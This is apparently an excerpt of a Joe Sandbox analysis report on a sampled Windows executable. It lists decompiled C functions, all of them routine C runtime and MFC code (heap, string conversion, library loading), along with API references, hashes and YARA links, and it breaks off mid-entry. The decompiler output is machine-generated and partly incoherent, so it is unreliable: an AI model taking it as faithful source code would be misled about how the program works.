                                                                                                                            C-Code - Quality: 43%
                                                                                                                            			E0041D8F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x43d038);
				_t8 = E0042066C(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E004206B1(_t8);
				}
				if( *0x446878 != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0x444ac8, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E0041EC4C(_t32);
						 *_t10 = E0041EC11(GetLastError());
					}
					goto L9;
				}
				E00422A33(__ebx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00422AAC(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00422AD7();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E0041D947();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                                                                                                                            0x0041d8f1
                                                                                                                            0x0041d8f3
                                                                                                                            0x0041d8f8
                                                                                                                            0x0041d8fd
                                                                                                                            0x0041d902
                                                                                                                            0x0041d979
                                                                                                                            0x0041d97e
                                                                                                                            0x0041d97e
                                                                                                                            0x0041d90b
                                                                                                                            0x0041d950
                                                                                                                            0x0041d951
                                                                                                                            0x0041d959
                                                                                                                            0x0041d95f
                                                                                                                            0x0041d961
                                                                                                                            0x0041d963
                                                                                                                            0x0041d976
                                                                                                                            0x0041d978
                                                                                                                            0x00000000
                                                                                                                            0x0041d961
                                                                                                                            0x0041d90f
                                                                                                                            0x0041d915
                                                                                                                            0x0041d91a
                                                                                                                            0x0041d920
                                                                                                                            0x0041d925
                                                                                                                            0x0041d927
                                                                                                                            0x0041d928
                                                                                                                            0x0041d929
                                                                                                                            0x0041d92f
                                                                                                                            0x0041d930
                                                                                                                            0x0041d937
                                                                                                                            0x0041d940
                                                                                                                            0x00000000
                                                                                                                            0x0041d942
                                                                                                                            0x0041d942
                                                                                                                            0x00000000
                                                                                                                            0x0041d942

                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0041D90F
                                                                                                                              • Part of subcall function 00422A33: __mtinitlocknum.LIBCMT ref: 00422A47
                                                                                                                              • Part of subcall function 00422A33: __amsg_exit.LIBCMT ref: 00422A53
                                                                                                                              • Part of subcall function 00422A33: EnterCriticalSection.KERNEL32(?,?,4917EADC,0041DA00,00000004,0043D058,0000000C,0042263C,?,?,00000000,00000000,00000000,004222DE,00000001,00000214), ref: 00422A5B
                                                                                                                            • ___sbh_find_block.LIBCMT ref: 0041D91A
                                                                                                                            • ___sbh_free_block.LIBCMT ref: 0041D929
                                                                                                                            • HeapFree.KERNEL32(00000000,4917EADC,0043D038,0000000C,00422A14,00000000,0043D1A8,0000000C,00422A4C,4917EADC,?,4917EADC,0041DA00,00000004,0043D058,0000000C), ref: 0041D959
                                                                                                                            • GetLastError.KERNEL32(?,00402540,?,?,00000000,0040DAC2,0000000C,00000004,00401496,?,0040150B,80070057,4917EADC,0040E656,?,00000004), ref: 0041D96A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2714421763-0
                                                                                                                            • Opcode ID: 5b0a319c35a19f39f28be6c234d2d1e858a920f64126c1768673e6c0823c0a5b
                                                                                                                            • Instruction ID: cf53a05ff717991ca5354de368125920ccadf1dd490327cdac5f416f9947d942
                                                                                                                            • Opcode Fuzzy Hash: 5b0a319c35a19f39f28be6c234d2d1e858a920f64126c1768673e6c0823c0a5b
                                                                                                                            • Instruction Fuzzy Hash: 760162F1D11325BAEF24AF72AC06B9E7BB49F40729F50016FF504A6191DB7C89C08A9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042B811 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0042B811() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x446740;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x446740 = _t5;
				}
				_t6 = E00422629(_t5, 4);
				 *0x445734 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x442038;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4422b8) {
							break;
						}
						_t6 =  *0x445734;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x442048;
					do {
						_t10 =  *((intOrPtr*)((_t20 & 0x0000001f) * 0x28 +  *((intOrPtr*)(0x446760 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x4420a8);
					return 0;
				} else {
					 *0x446740 = _t26;
					_t6 = E00422629(_t26, 4);
					 *0x445734 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                                                                                                                            0x0042b811
                                                                                                                            0x0042b81b
                                                                                                                            0x0042b81c
                                                                                                                            0x0042b827
                                                                                                                            0x0042b829
                                                                                                                            0x00000000
                                                                                                                            0x0042b829
                                                                                                                            0x0042b81e
                                                                                                                            0x0042b81e
                                                                                                                            0x0042b82b
                                                                                                                            0x0042b82b
                                                                                                                            0x0042b82b
                                                                                                                            0x0042b833
                                                                                                                            0x0042b83c
                                                                                                                            0x0042b841
                                                                                                                            0x0042b861
                                                                                                                            0x0042b861
                                                                                                                            0x0042b863
                                                                                                                            0x0042b86f
                                                                                                                            0x0042b86f
                                                                                                                            0x0042b872
                                                                                                                            0x0042b875
                                                                                                                            0x0042b87e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0042b86a
                                                                                                                            0x0042b86a
                                                                                                                            0x0042b882
                                                                                                                            0x0042b883
                                                                                                                            0x0042b885
                                                                                                                            0x0042b88b
                                                                                                                            0x0042b89f
                                                                                                                            0x0042b8a5
                                                                                                                            0x0042b8af
                                                                                                                            0x0042b8af
                                                                                                                            0x0042b8b1
                                                                                                                            0x0042b8b4
                                                                                                                            0x0042b8b5
                                                                                                                            0x0042b8c1
                                                                                                                            0x0042b843
                                                                                                                            0x0042b846
                                                                                                                            0x0042b84c
                                                                                                                            0x0042b855
                                                                                                                            0x0042b85a
                                                                                                                            0x00000000
                                                                                                                            0x0042b85c
                                                                                                                            0x0042b85e
                                                                                                                            0x0042b860
                                                                                                                            0x0042b860
                                                                                                                            0x0042b85a

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt
                                                                                                                            • String ID: @WD$H D
                                                                                                                            • API String ID: 3494438863-3497208315
                                                                                                                            • Opcode ID: 1f68396697ee615ab777f036ac07e7ac4108b0dfc8750028fd6794aeb0eb6cf9
                                                                                                                            • Instruction ID: 8f91b924223b383a103e9ac1f433d8596f798c9b6b83569e0c3b3fe1a6f440b1
                                                                                                                            • Opcode Fuzzy Hash: 1f68396697ee615ab777f036ac07e7ac4108b0dfc8750028fd6794aeb0eb6cf9
                                                                                                                            • Instruction Fuzzy Hash: F6110A327056205BF728AF2E7D8127623C9FB86734BA4453BF508CB3A1DB78888142CD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B274 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E0040B274(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E00418196(__ebp, 0xc);
				_push(E0040A73C);
				_t26 = E0040E2D5(__ebx, 0x444410, __edi, _t25, _t28);
				if(_t26 == 0) {
					E0040D8B0(0x444410);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E00418203(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E00408D86(_t21, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}











                                                                                                                            0x0040b274
                                                                                                                            0x0040b274
                                                                                                                            0x0040b274
                                                                                                                            0x0040b277
                                                                                                                            0x0040b27c
                                                                                                                            0x0040b28b
                                                                                                                            0x0040b28f
                                                                                                                            0x0040b291
                                                                                                                            0x0040b291
                                                                                                                            0x0040b296
                                                                                                                            0x0040b29a
                                                                                                                            0x0040b2d4
                                                                                                                            0x0040b2d6
                                                                                                                            0x00000000
                                                                                                                            0x0040b29c
                                                                                                                            0x0040b29c
                                                                                                                            0x0040b2a1
                                                                                                                            0x0040b2a9
                                                                                                                            0x0040b2ac
                                                                                                                            0x0040b2b8
                                                                                                                            0x0040b2be
                                                                                                                            0x0040b2c0
                                                                                                                            0x0040b2c3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040b2c8
                                                                                                                            0x0040b2ce
                                                                                                                            0x0040b2ce
                                                                                                                            0x00000000
                                                                                                                            0x0040b2ae

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00418196: EnterCriticalSection.KERNEL32(00444660,?,?,?,00000000,0040E2F0,00000010,00000008,0040709B,0040703E,00405A19,00402E5A,?,?,00401084), ref: 004181D2
                                                                                                                              • Part of subcall function 00418196: InitializeCriticalSection.KERNEL32(4917EADC,?,?,?,00000000,0040E2F0,00000010,00000008,0040709B,0040703E,00405A19,00402E5A,?,?,00401084), ref: 004181E1
                                                                                                                              • Part of subcall function 00418196: LeaveCriticalSection.KERNEL32(00444660,?,?,?,00000000,0040E2F0,00000010,00000008,0040709B,0040703E,00405A19,00402E5A,?,?,00401084), ref: 004181EE
                                                                                                                              • Part of subcall function 00418196: EnterCriticalSection.KERNEL32(4917EADC,?,?,?,00000000,0040E2F0,00000010,00000008,0040709B,0040703E,00405A19,00402E5A,?,?,00401084), ref: 004181FA
                                                                                                                              • Part of subcall function 0040E2D5: __EH_prolog3_catch.LIBCMT ref: 0040E2DC
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 0040B2B8
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040B2C8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                            • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                            • API String ID: 3274081130-63838506
                                                                                                                            • Opcode ID: 04990735a3ed8088a7a06c3c8cbc1a1087e1a054b2db99d639a3dfd846488f40
                                                                                                                            • Instruction ID: 5d4a9153ddec8040031e76e39a70a87fd2852937632460f24893a36ba03e6dfa
                                                                                                                            • Opcode Fuzzy Hash: 04990735a3ed8088a7a06c3c8cbc1a1087e1a054b2db99d639a3dfd846488f40
                                                                                                                            • Instruction Fuzzy Hash: 7001D631504301EBD7216F61E90AB4B76E0EF00715F11887FF495B15D0CB38C840875E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E00417D50(void* __ebx, void** __ecx, void* __ebp, intOrPtr _a4, char _a8) {
				intOrPtr _t7;
				void* _t8;
				signed int _t13;
				long _t21;
				void** _t25;

				_t1 =  &_a8; // 0x404e3f
				_t7 =  *_t1;
				_t25 = __ecx;
				_t21 = _t7 + 0x40;
				 *((intOrPtr*)(__ecx + 4)) = _t7;
				if(_t21 >= _t7) {
					_t8 = GlobalAlloc(0x40, _t21);
					 *_t25 = _t8;
					if(_t8 == 0) {
						goto L1;
					}
					_t23 = GlobalLock(_t8);
					E00403659(__ebx, __ebp, _t10, _t25[1], _a4, _t25[1]);
					_t13 = E00417C10(_t23);
					asm("sbb eax, eax");
					_t25[2] =  ~_t13 + 1;
					GlobalUnlock( *_t25);
					return 1;
				}
				L1:
				return 0;
			}








                                                                                                                            0x00417d50
                                                                                                                            0x00417d50
                                                                                                                            0x00417d55
                                                                                                                            0x00417d57
                                                                                                                            0x00417d5c
                                                                                                                            0x00417d5f
                                                                                                                            0x00417d68
                                                                                                                            0x00417d70
                                                                                                                            0x00417d72
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00417d7c
                                                                                                                            0x00417d88
                                                                                                                            0x00417d8e
                                                                                                                            0x00417d9a
                                                                                                                            0x00417d9d
                                                                                                                            0x00417da0
                                                                                                                            0x00000000
                                                                                                                            0x00417da9
                                                                                                                            0x00417d61
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,?,00417FCC,?,00000000,00000000,?,00404E3F,?,?,?,Local AppWizard-Generated Applications), ref: 00417D68
                                                                                                                            • GlobalLock.KERNEL32 ref: 00417D76
                                                                                                                            • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,Local AppWizard-Generated Applications), ref: 00417DA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocLockUnlock
                                                                                                                            • String ID: ?N@
                                                                                                                            • API String ID: 3972497268-3360708772
                                                                                                                            • Opcode ID: 4b1151f94345333b62786e4a448136d0fb384e3f790132430308a6b2f2b7f768
                                                                                                                            • Instruction ID: 4c007cf5232c365fa8d5c1e602733b8804a175883cad00b8ac1bc298c2317356
                                                                                                                            • Opcode Fuzzy Hash: 4b1151f94345333b62786e4a448136d0fb384e3f790132430308a6b2f2b7f768
                                                                                                                            • Instruction Fuzzy Hash: 2CF04972618201AFC760AF78D84897B7AE8EF99706700483EF19BC2250E63484818725
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408AD1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 25%
                                                                                                                            			E00408AD1(char* _a4, int _a8) {
				int _v0;
				char* _v4;
				short* _t6;
				int _t10;
				short* _t11;

				_t6 = MultiByteToWideChar( *0x4427d8(), 0, _a4, _a8, 0, 0);
				_t10 = _t6;
				__imp__#4(0, _t10);
				_t11 = _t6;
				if(_t11 != 0) {
					MultiByteToWideChar( *0x4427d8(), 0, _v4, _v0, _t11, _t10);
				}
				return _t11;
			}








                                                                                                                            0x00408aef
                                                                                                                            0x00408af1
                                                                                                                            0x00408af5
                                                                                                                            0x00408afb
                                                                                                                            0x00408aff
                                                                                                                            0x00408b13
                                                                                                                            0x00408b13
                                                                                                                            0x00408b1b

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00408AEF
                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00408AF5
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000), ref: 00408B13
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                                                            • String ID: 5C
                                                                                                                            • API String ID: 262959230-3824571658
                                                                                                                            • Opcode ID: 949a61190c602eb8e90156958d6dac20eaa2ceca4f7fd3519e2557e85b5bf704
                                                                                                                            • Instruction ID: b423bcd372d5ffc65499638065b3616207b319332a832bac22542c6c58a55501
                                                                                                                            • Opcode Fuzzy Hash: 949a61190c602eb8e90156958d6dac20eaa2ceca4f7fd3519e2557e85b5bf704
                                                                                                                            • Instruction Fuzzy Hash: 31E0657620025C7FC7011BA5EC4CC3F7FADFBCE29E745052AF64592110CA7A99509B70
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418151 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00418151(void* __eax, void* __ebx, void* __edx, void* __edi) {
				void* _t5;

				_t5 = __eax;
				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
			}




                                                                                                                            0x00418151
                                                                                                                            0x00418157

                                                                                                                            APIs
                                                                                                                            • DeleteCriticalSection.KERNEL32(00444660), ref: 0041816E
                                                                                                                            • DeleteCriticalSection.KERNEL32(004444C8), ref: 00418180
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalDeleteSection
                                                                                                                            • String ID: `FD$xFD
                                                                                                                            • API String ID: 166494926-3230197992
                                                                                                                            • Opcode ID: 116f62b4a28b44ebce3b841d5c2ac23e683cd498ce49ed31d0380ef26e6e8b14
                                                                                                                            • Instruction ID: aa6187a865117bad011fd0c1dfdd7d34ee2c11729c07e7c65f21c49341d47b35
                                                                                                                            • Opcode Fuzzy Hash: 116f62b4a28b44ebce3b841d5c2ac23e683cd498ce49ed31d0380ef26e6e8b14
                                                                                                                            • Instruction Fuzzy Hash: 47E08673500204A7E7201B89FC847857268EBC3325F1F433FE50851261C77D4C81CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418152 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00418152(void* __eax, void* __ebx, void* __edx, void* __edi) {
				void* _t5;

				_t5 = __eax;
				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
			}




                                                                                                                            0x00418152
                                                                                                                            0x00418157

                                                                                                                            APIs
                                                                                                                            • DeleteCriticalSection.KERNEL32(00444660), ref: 0041816E
                                                                                                                            • DeleteCriticalSection.KERNEL32(004444C8), ref: 00418180
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalDeleteSection
                                                                                                                            • String ID: `FD$xFD
                                                                                                                            • API String ID: 166494926-3230197992
                                                                                                                            • Opcode ID: cbacd72eb334275c6055bf74f33c7ae7995552d8c4ed9a0eb4aa71309ff46cda
                                                                                                                            • Instruction ID: 381fb2d0d674cde05aa81ab99304d3cb5c38745a88c5c9e1a20222765e080825
                                                                                                                            • Opcode Fuzzy Hash: cbacd72eb334275c6055bf74f33c7ae7995552d8c4ed9a0eb4aa71309ff46cda
                                                                                                                            • Instruction Fuzzy Hash: 2FE0CD7394520567F7205A89BCC07496658CBC333571F877FD44891151C75D9C4186AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00429C21 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E00429C21() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x436920;
					_v28 =  *0x436918;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                            0x00429c26
                                                                                                                            0x00429c2e
                                                                                                                            0x00429c45
                                                                                                                            0x00429bf1
                                                                                                                            0x00429bfa
                                                                                                                            0x00429c06
                                                                                                                            0x00429c09
                                                                                                                            0x00429c0c
                                                                                                                            0x00429c0e
                                                                                                                            0x00429c11
                                                                                                                            0x00429c16
                                                                                                                            0x00429c20
                                                                                                                            0x00429c18
                                                                                                                            0x00429c1c
                                                                                                                            0x00429c1c
                                                                                                                            0x00429c30
                                                                                                                            0x00429c36
                                                                                                                            0x00429c3e
                                                                                                                            0x00000000
                                                                                                                            0x00429c40
                                                                                                                            0x00429c40
                                                                                                                            0x00429c44
                                                                                                                            0x00429c44
                                                                                                                            0x00429c3e

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00421618), ref: 00429C26
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00429C36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                            • Opcode ID: 1283214f7b5c66783e3c8fa32b7076d66c18768ba32f5ce754c4fbdc23786278
                                                                                                                            • Instruction ID: f5b04fa39481e11b0b3c82a787901d2d64223aa5f08b6c75891a3ddb609fb812
